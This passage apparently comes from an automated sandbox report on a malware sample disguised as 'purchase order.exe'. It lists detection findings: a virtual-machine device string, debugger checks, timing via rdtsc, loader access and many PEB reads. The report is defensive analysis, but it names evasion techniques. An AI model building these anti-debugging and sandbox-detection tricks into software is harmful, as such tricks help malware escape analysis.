Source: explorer.exe, 00000003.00000000.357823561.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\purchase order.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\purchase order.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00409A80 rdtsc 2_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0040ACC0 LdrLoadDll, 2_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB171 mov eax, dword ptr fs:[00000030h] 2_2_017AB171
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB171 mov eax, dword ptr fs:[00000030h] 2_2_017AB171
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AC962 mov eax, dword ptr fs:[00000030h] 2_2_017AC962
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018269A6 mov eax, dword ptr fs:[00000030h] 2_2_018269A6
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CB944 mov eax, dword ptr fs:[00000030h] 2_2_017CB944
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CB944 mov eax, dword ptr fs:[00000030h] 2_2_017CB944
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018251BE mov eax, dword ptr fs:[00000030h] 2_2_018251BE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D513A mov eax, dword ptr fs:[00000030h] 2_2_017D513A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D513A mov eax, dword ptr fs:[00000030h] 2_2_017D513A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C4120 mov ecx, dword ptr fs:[00000030h] 2_2_017C4120
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018341E8 mov eax, dword ptr fs:[00000030h] 2_2_018341E8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h] 2_2_017A9100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h] 2_2_017A9100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h] 2_2_017A9100
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017AB1E1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017AB1E1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017AB1E1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D61A0 mov eax, dword ptr fs:[00000030h] 2_2_017D61A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D61A0 mov eax, dword ptr fs:[00000030h] 2_2_017D61A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2990 mov eax, dword ptr fs:[00000030h] 2_2_017D2990
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA185 mov eax, dword ptr fs:[00000030h] 2_2_017DA185
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CC182 mov eax, dword ptr fs:[00000030h] 2_2_017CC182
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01823884 mov eax, dword ptr fs:[00000030h] 2_2_01823884
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01823884 mov eax, dword ptr fs:[00000030h] 2_2_01823884
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C0050 mov eax, dword ptr fs:[00000030h] 2_2_017C0050
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C0050 mov eax, dword ptr fs:[00000030h] 2_2_017C0050
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D002D mov eax, dword ptr fs:[00000030h] 2_2_017D002D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D002D mov eax, dword ptr fs:[00000030h] 2_2_017D002D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D002D mov eax, dword ptr fs:[00000030h] 2_2_017D002D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D002D mov eax, dword ptr fs:[00000030h] 2_2_017D002D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D002D mov eax, dword ptr fs:[00000030h] 2_2_017D002D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h] 2_2_017BB02A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h] 2_2_017BB02A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h] 2_2_017BB02A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h] 2_2_017BB02A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0183B8D0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01874015 mov eax, dword ptr fs:[00000030h] 2_2_01874015
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01874015 mov eax, dword ptr fs:[00000030h] 2_2_01874015
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827016 mov eax, dword ptr fs:[00000030h] 2_2_01827016
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827016 mov eax, dword ptr fs:[00000030h] 2_2_01827016
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827016 mov eax, dword ptr fs:[00000030h] 2_2_01827016
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A58EC mov eax, dword ptr fs:[00000030h] 2_2_017A58EC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DF0BF mov ecx, dword ptr fs:[00000030h] 2_2_017DF0BF
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DF0BF mov eax, dword ptr fs:[00000030h] 2_2_017DF0BF
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DF0BF mov eax, dword ptr fs:[00000030h] 2_2_017DF0BF
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E90AF mov eax, dword ptr fs:[00000030h] 2_2_017E90AF
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h] 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h] 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h] 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h] 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h] 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h] 2_2_017D20A0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01871074 mov eax, dword ptr fs:[00000030h] 2_2_01871074
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01862073 mov eax, dword ptr fs:[00000030h] 2_2_01862073
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9080 mov eax, dword ptr fs:[00000030h] 2_2_017A9080
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185D380 mov ecx, dword ptr fs:[00000030h] 2_2_0185D380
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D3B7A mov eax, dword ptr fs:[00000030h] 2_2_017D3B7A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D3B7A mov eax, dword ptr fs:[00000030h] 2_2_017D3B7A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186138A mov eax, dword ptr fs:[00000030h] 2_2_0186138A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017ADB60 mov ecx, dword ptr fs:[00000030h] 2_2_017ADB60
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01875BA5 mov eax, dword ptr fs:[00000030h] 2_2_01875BA5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AF358 mov eax, dword ptr fs:[00000030h] 2_2_017AF358
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017ADB40 mov eax, dword ptr fs:[00000030h] 2_2_017ADB40
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018253CA mov eax, dword ptr fs:[00000030h] 2_2_018253CA
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018253CA mov eax, dword ptr fs:[00000030h] 2_2_018253CA
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CDBE9 mov eax, dword ptr fs:[00000030h] 2_2_017CDBE9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186131B mov eax, dword ptr fs:[00000030h] 2_2_0186131B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h] 2_2_017D03E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h] 2_2_017D03E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h] 2_2_017D03E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h] 2_2_017D03E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h] 2_2_017D03E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h] 2_2_017D03E2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4BAD mov eax, dword ptr fs:[00000030h] 2_2_017D4BAD
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4BAD mov eax, dword ptr fs:[00000030h] 2_2_017D4BAD
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4BAD mov eax, dword ptr fs:[00000030h] 2_2_017D4BAD
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878B58 mov eax, dword ptr fs:[00000030h] 2_2_01878B58
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2397 mov eax, dword ptr fs:[00000030h] 2_2_017D2397
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DB390 mov eax, dword ptr fs:[00000030h] 2_2_017DB390
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B1B8F mov eax, dword ptr fs:[00000030h] 2_2_017B1B8F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B1B8F mov eax, dword ptr fs:[00000030h] 2_2_017B1B8F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E927A mov eax, dword ptr fs:[00000030h] 2_2_017E927A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h] 2_2_017A9240
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h] 2_2_017A9240
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h] 2_2_017A9240
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h] 2_2_017A9240
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E4A2C mov eax, dword ptr fs:[00000030h] 2_2_017E4A2C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E4A2C mov eax, dword ptr fs:[00000030h] 2_2_017E4A2C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C3A1C mov eax, dword ptr fs:[00000030h] 2_2_017C3A1C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A5210 mov eax, dword ptr fs:[00000030h] 2_2_017A5210
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A5210 mov ecx, dword ptr fs:[00000030h] 2_2_017A5210
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A5210 mov eax, dword ptr fs:[00000030h] 2_2_017A5210
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A5210 mov eax, dword ptr fs:[00000030h] 2_2_017A5210
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AAA16 mov eax, dword ptr fs:[00000030h] 2_2_017AAA16
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AAA16 mov eax, dword ptr fs:[00000030h] 2_2_017AAA16
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B8A0A mov eax, dword ptr fs:[00000030h] 2_2_017B8A0A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186AA16 mov eax, dword ptr fs:[00000030h] 2_2_0186AA16
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186AA16 mov eax, dword ptr fs:[00000030h] 2_2_0186AA16
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2AE4 mov eax, dword ptr fs:[00000030h] 2_2_017D2AE4
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2ACB mov eax, dword ptr fs:[00000030h] 2_2_017D2ACB
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BAAB0 mov eax, dword ptr fs:[00000030h] 2_2_017BAAB0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BAAB0 mov eax, dword ptr fs:[00000030h] 2_2_017BAAB0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DFAB0 mov eax, dword ptr fs:[00000030h] 2_2_017DFAB0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186EA55 mov eax, dword ptr fs:[00000030h] 2_2_0186EA55
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01834257 mov eax, dword ptr fs:[00000030h] 2_2_01834257
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h] 2_2_017A52A5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h] 2_2_017A52A5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h] 2_2_017A52A5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h] 2_2_017A52A5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h] 2_2_017A52A5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185B260 mov eax, dword ptr fs:[00000030h] 2_2_0185B260
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0185B260 mov eax, dword ptr fs:[00000030h] 2_2_0185B260
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878A62 mov eax, dword ptr fs:[00000030h] 2_2_01878A62
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DD294 mov eax, dword ptr fs:[00000030h] 2_2_017DD294
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DD294 mov eax, dword ptr fs:[00000030h] 2_2_017DD294
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CC577 mov eax, dword ptr fs:[00000030h] 2_2_017CC577
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017CC577 mov eax, dword ptr fs:[00000030h] 2_2_017CC577
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018705AC mov eax, dword ptr fs:[00000030h] 2_2_018705AC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018705AC mov eax, dword ptr fs:[00000030h] 2_2_018705AC
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C7D50 mov eax, dword ptr fs:[00000030h] 2_2_017C7D50
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017E3D43 mov eax, dword ptr fs:[00000030h] 2_2_017E3D43
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4D3B mov eax, dword ptr fs:[00000030h] 2_2_017D4D3B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4D3B mov eax, dword ptr fs:[00000030h] 2_2_017D4D3B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D4D3B mov eax, dword ptr fs:[00000030h] 2_2_017D4D3B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017AAD30 mov eax, dword ptr fs:[00000030h] 2_2_017AAD30
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov ecx, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h] 2_2_01826DC9
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h] 2_2_017B3D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 2_2_0186FDE2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 2_2_0186FDE2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 2_2_0186FDE2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 2_2_0186FDE2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01858DF1 mov eax, dword ptr fs:[00000030h] 2_2_01858DF1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BD5E0 mov eax, dword ptr fs:[00000030h] 2_2_017BD5E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017BD5E0 mov eax, dword ptr fs:[00000030h] 2_2_017BD5E0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878D34 mov eax, dword ptr fs:[00000030h] 2_2_01878D34
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0182A537 mov eax, dword ptr fs:[00000030h] 2_2_0182A537
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186E539 mov eax, dword ptr fs:[00000030h] 2_2_0186E539
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01823540 mov eax, dword ptr fs:[00000030h] 2_2_01823540
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 2_2_017D1DB5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 2_2_017D1DB5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 2_2_017D1DB5
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D35A1 mov eax, dword ptr fs:[00000030h] 2_2_017D35A1
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DFD9B mov eax, dword ptr fs:[00000030h] 2_2_017DFD9B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DFD9B mov eax, dword ptr fs:[00000030h] 2_2_017DFD9B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h] 2_2_017A2D8A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h] 2_2_017A2D8A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h] 2_2_017A2D8A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h] 2_2_017A2D8A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017A2D8A mov eax, dword ptr fs:[00000030h] 2_2_017A2D8A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h] 2_2_017D2581
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h] 2_2_017D2581
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h] 2_2_017D2581
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017D2581 mov eax, dword ptr fs:[00000030h] 2_2_017D2581
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017C746D mov eax, dword ptr fs:[00000030h] 2_2_017C746D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DA44B mov eax, dword ptr fs:[00000030h] 2_2_017DA44B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01878CD6 mov eax, dword ptr fs:[00000030h] 2_2_01878CD6
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017DBC2C mov eax, dword ptr fs:[00000030h] 2_2_017DBC2C
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826CF0 mov eax, dword ptr fs:[00000030h] 2_2_01826CF0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826CF0 mov eax, dword ptr fs:[00000030h] 2_2_01826CF0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826CF0 mov eax, dword ptr fs:[00000030h] 2_2_01826CF0
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_018614FB mov eax, dword ptr fs:[00000030h] 2_2_018614FB
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01861C06 mov eax, dword ptr fs:[00000030h] 2_2_01861C06
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h] 2_2_01826C0A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h] 2_2_01826C0A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h] 2_2_01826C0A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01826C0A mov eax, dword ptr fs:[00000030h] 2_2_01826C0A
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187740D mov eax, dword ptr fs:[00000030h] 2_2_0187740D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187740D mov eax, dword ptr fs:[00000030h] 2_2_0187740D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0187740D mov eax, dword ptr fs:[00000030h] 2_2_0187740D
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183C450 mov eax, dword ptr fs:[00000030h] 2_2_0183C450
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0183C450 mov eax, dword ptr fs:[00000030h] 2_2_0183C450
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017B849B mov eax, dword ptr fs:[00000030h] 2_2_017B849B
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827794 mov eax, dword ptr fs:[00000030h] 2_2_01827794
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01827794 mov eax, dword ptr fs:[00000030h] 2_2_01827794
